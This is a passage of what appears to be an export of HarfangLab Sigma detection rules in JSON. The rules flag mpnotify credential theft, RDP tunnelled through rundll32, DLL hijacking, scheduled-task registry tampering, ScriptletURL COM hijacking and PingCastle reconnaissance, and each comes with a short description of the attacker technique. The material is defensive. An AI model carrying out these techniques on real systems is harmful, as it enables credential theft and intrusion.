"errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1b1d99a0-6099-42fb-91b2-87fead258765", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": 
"b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.071746Z", + "creation_date": "2026-03-23T11:45:34.071748Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.071752Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.scip.ch/en/?labs.20220217", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://attack.mitre.org/techniques/T1556/008/" + ], + "name": "t1556_008_file_dropped_mpnotify.yml", + "content": "title: File Written to Disk by mpnotify.exe\nid: 1b1d99a0-6099-42fb-91b2-87fead258765\ndescription: |\n Detects when a file is written to disk by the mpnotify process.\n This may be a consequence of an attacker trying to access users' credentials using a malicious Network Provider.\n It is recommended to investigate the content of the written file, the DLL loaded by the mpnotify process to look for unsigned libraries, as well as indicators of a Network Provider installation.\nreferences:\n - https://www.scip.ch/en/?labs.20220217\n - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\n - https://attack.mitre.org/techniques/T1556/008/\ndate: 2023/08/08\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1556.008\n - attack.t1112\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\mpnotify.exe'\n\n exclusion_citrix:\n Path:\n - '?:\\Program Files\\Citrix\\Secure Access Client\\logs\\nsnp.txt'\n - 
'?:\\Program Files (x86)\\Citrix\\Secure Access Client\\logs\\nsnp.txt'\n - '?:\\ProgramData\\Citrix\\AGEE\\nsnp.txt'\n - '?:\\Program Files\\Citrix\\Secure Access Client\\logs\\csa_nsnp.txt'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Citrix\\AGEE\\config.js'\n\n exclusion_dell:\n Path: '?:\\Windows\\Temp\\14ADCEAA-576A-45E5-94B5-EE925ED3E963'\n\n exclusion_novell:\n # https://beta.novell.com/documentation/zenworks-2020/zen_fde_agent/data/bryok2g.html\n Path:\n - '*\\PBA.log'\n - '*\\FDE.log'\n - '?:\\Windows\\System32\\ZCredMgr.LOG'\n - '?:\\Windows\\System32\\ZenCredManager.LOG'\n\n exclusion_crypto_key:\n Path:\n - '?:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\3310a4fa6cb9c60504498d7eea986fc2_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\a398a5cd31e2b6b587ab0b426ca6dc4d_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\a398a5cd31e2b6b587ab0b426ca6dc4d_????????-????-????-????-????????????'\n\n exclusion_f5:\n Path: '?:\\Windows\\Temp\\f5netprov.txt'\n\n exclusion_windhawk:\n Path: '?:\\ProgramData\\Windhawk\\Engine\\ModsWritable\\mod-task\\\\*_slick-window-arrangement'\n\n exclusion_zsso:\n Path|startswith: '?:\\Windows\\Temp\\zsso\\ZCredentialManager'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1b1d99a0-6099-42fb-91b2-87fead258765", + "rule_name": "File Written to Disk by mpnotify.exe", + "rule_description": "Detects when a file is written to disk by the mpnotify process.\nThis may be a consequence of an attacker trying to access users' credentials using a malicious Network Provider.\nIt is recommended to investigate the content of the written file, the DLL loaded by the mpnotify process to look for unsigned libraries, as well as indicators of a Network Provider installation.\n", + 
"rule_creation_date": "2023-08-08", + "rule_modified_date": "2025-02-12", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1556.008" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1b3ebc5b-072e-4731-938e-df8d4ab5c802", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.083394Z", + "creation_date": "2026-03-23T11:45:34.083397Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.083401Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", + "https://attack.mitre.org/techniques/T1021/001/" + ], + "name": "t1021_001_unusual_process_rdp.yml", + "content": "title: RDP Connection Initiated by Unusual Process\nid: 1b3ebc5b-072e-4731-938e-df8d4ab5c802\ndescription: |\n Detects an RDP connection initiated by an unusual process.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with 
known credentials.\n Attackers can proxying RDP traffic via a legitimate windows process such as RunDLL32 to reduce the exposure of their own infrastructure and evade detection.\n It is recommended to analyze the context and user around this RDP connection to determine if this connection is the result of legitimate administrative operations.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2024/02/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n DestinationPort: '3389'\n ProcessOriginalFileName: 'rundll32.exe'\n Initiated: 'true'\n\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1b3ebc5b-072e-4731-938e-df8d4ab5c802", + "rule_name": "RDP Connection Initiated by Unusual Process", + "rule_description": "Detects an RDP connection initiated by an unusual process.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nAttackers can proxying RDP traffic via a legitimate windows process such as RunDLL32 to reduce the exposure of their own infrastructure and evade detection.\nIt is recommended to analyze the context and user around this RDP connection to determine if this connection is the result of legitimate administrative operations.\n", + "rule_creation_date": "2024-02-22", + "rule_modified_date": "2025-04-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1021.001" + 
], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1b4396df-ab50-493f-8787-8ca376e71f09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.619180Z", + "creation_date": "2026-03-23T11:45:34.619182Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.619186Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_wsmprovhost.yml", + "content": "title: DLL Hijacking via wsmprovhost.exe\nid: 1b4396df-ab50-493f-8787-8ca376e71f09\ndescription: |\n Detects potential Windows DLL Hijacking via wsmprovhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n 
Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wsmprovhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DSROLE.dll'\n - '\\mi.dll'\n - '\\miutils.dll'\n - '\\wsmsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1b4396df-ab50-493f-8787-8ca376e71f09", + "rule_name": "DLL Hijacking via wsmprovhost.exe", + "rule_description": "Detects potential Windows DLL 
Hijacking via wsmprovhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1b45b5ab-100f-4546-9d16-1e8f6b6cb22b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.078559Z", + "creation_date": "2026-03-23T11:45:34.078561Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.078565Z", + "rule_level": "high", + "rule_confidence": "strong", + 
"rule_confidence_override": null, + "references": [ + "https://github.com/netero1010/GhostTask", + "https://attack.mitre.org/techniques/T1112/", + "https://attack.mitre.org/techniques/T1053/005/" + ], + "name": "t1112_scheduled_task_updated_registry.yml", + "content": "title: Scheduled Task Actions Updated via Registry Modification\nid: 1b45b5ab-100f-4546-9d16-1e8f6b6cb22b\ndescription: |\n Detects the update of scheduled task actions via a manual registry modification.\n Scheduled tasks are often used by attackers as persistence mechanisms.\n To evade detection, they can update an existing scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/netero1010/GhostTask\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2024/01/04\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\\\*\\Actions'\n ProcessImage|contains: '\\'\n\n filter_scheduler:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n\n exclusion_windeploy:\n ProcessCommandLine:\n - 
'?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1b45b5ab-100f-4546-9d16-1e8f6b6cb22b", + "rule_name": "Scheduled Task Actions Updated via Registry Modification", + "rule_description": "Detects the update of scheduled task actions via a manual registry modification.\nScheduled tasks are often used by attackers as persistence mechanisms.\nTo evade detection, they can update an existing scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n", + "rule_creation_date": "2024-01-04", + "rule_modified_date": "2025-08-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1053.005", + "attack.t1112" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1b63e7c7-7ee6-45a2-9107-662ddc98a824", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + 
"is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.091179Z", + "creation_date": "2026-03-23T11:45:34.091181Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.091186Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_wowreg32.yml", + "content": "title: DLL Hijacking via wowreg32.exe\nid: 1b63e7c7-7ee6-45a2-9107-662ddc98a824\ndescription: |\n Detects potential Windows DLL Hijacking via wowreg32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n 
ProcessOriginalFileName: 'wowreg32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\devrtl.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1b63e7c7-7ee6-45a2-9107-662ddc98a824", + "rule_name": "DLL Hijacking via wowreg32.exe", + "rule_description": "Detects potential Windows DLL Hijacking via wowreg32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1b8277e3-f753-4c37-9719-e62bb969c2b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + 
"rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.627150Z", + "creation_date": "2026-03-23T11:45:34.627152Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.627156Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://pentestlab.blog/2020/05/20/persistence-com-hijacking/", + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/Archive-Old-Version/OSScripts/Slmgr.vbs.md", + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://attack.mitre.org/techniques/T1216/", + "https://attack.mitre.org/techniques/T1112/", + "https://attack.mitre.org/techniques/T1546/015/" + ], + "name": "t1216_com_hijacking_remote_scriptlet_registry.yml", + "content": "title: Registry ScriptletURL Modified\nid: 1b8277e3-f753-4c37-9719-e62bb969c2b3\ndescription: |\n Detects the registration of a remote Windows Scripting Components via the ScriptletURL registry key.\n This key defines the remote location of the arbitrary .sct file that will be downloaded and executed when the related COM class will be invoked.\n Attackers can use a remote malicious scriptlet to achieve persistence and evade detection.\n It is recommended to check for other suspicious activities by the process making the registry modification.\nreferences:\n - 
https://pentestlab.blog/2020/05/20/persistence-com-hijacking/\n - https://github.com/LOLBAS-Project/LOLBAS/blob/master/Archive-Old-Version/OSScripts/Slmgr.vbs.md\n - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/\n - https://attack.mitre.org/techniques/T1216/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2022/11/14\nmodified: 2026/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - attack.t1112\n - attack.persistence\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\CLSID\\{????????-????-????-????-????????????}\\ScriptletURL\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_setuphost:\n ProcessParentImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_dismhost:\n ProcessImage: '?:\\windows\\temp\\\\????????-????-????-????-????????????\\dismhost.exe'\n\n exclusion_tiworker:\n ProcessImage: '?:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\tiworker.exe'\n\n exclusion_update:\n ProcessImage: '?:\\Windows\\System32\\poqexec.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1b8277e3-f753-4c37-9719-e62bb969c2b3", + "rule_name": "Registry ScriptletURL Modified", + "rule_description": "Detects the registration of a remote Windows Scripting Components via the ScriptletURL registry key.\nThis key defines the remote location of the arbitrary .sct file that will be downloaded and executed when the related COM class will be invoked.\nAttackers can use a remote 
malicious scriptlet to achieve persistence and evade detection.\nIt is recommended to check for other suspicious activities by the process making the registry modification.\n", + "rule_creation_date": "2022-11-14", + "rule_modified_date": "2026-02-12", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1216", + "attack.t1546.015" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1b864817-8a01-4cfe-9481-20ce115320c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:35.296790Z", + "creation_date": "2026-03-23T11:45:35.296792Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:35.296797Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://www.pingcastle.com/", + "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/" + ], + "name": "t1087_002_pingcastle.yml", + "content": "title: PingCastle Execution\nid: 1b864817-8a01-4cfe-9481-20ce115320c8\ndescription: |\n Detects the 
execution of PingCastle.\n PingCastle is a tool providing Active Directory security indicators and is often used by attackers during reconnaissance phase to find Active Directory vulnerabilities.\n This tool is often used for legitimate purposes. It is recommended to determine if the usage of this tool was warranted by the system administrators.\nreferences:\n - https://www.pingcastle.com/\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\ndate: 2023/03/20\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1018\n - attack.t1615\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.PingCastle\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'PingCastle.exe'\n - 'PingCastle.dll'\n\n condition: selection\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1b864817-8a01-4cfe-9481-20ce115320c8", + "rule_name": "PingCastle Execution", + "rule_description": "Detects the execution of PingCastle.\nPingCastle is a tool providing Active Directory security indicators and is often used by attackers during reconnaissance phase to find Active Directory vulnerabilities.\nThis tool is often used for legitimate purposes. 
It is recommended to determine if the usage of this tool was warranted by the system administrators.\n", + "rule_creation_date": "2023-03-20", + "rule_modified_date": "2026-02-25", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1615" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1c0971b5-dd3d-4802-967a-67f521f0ac2c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.626798Z", + "creation_date": "2026-03-23T11:45:34.626800Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.626804Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md", + "https://attack.mitre.org/techniques/T1137/004/" + ], + "name": "t1137_004_outlook_homepage_changed.yml", + "content": "title: Microsoft Outlook Homepage Changed via Registry\nid: 1c0971b5-dd3d-4802-967a-67f521f0ac2c\ndescription: |\n Detects a change of the Microsoft Outlook 
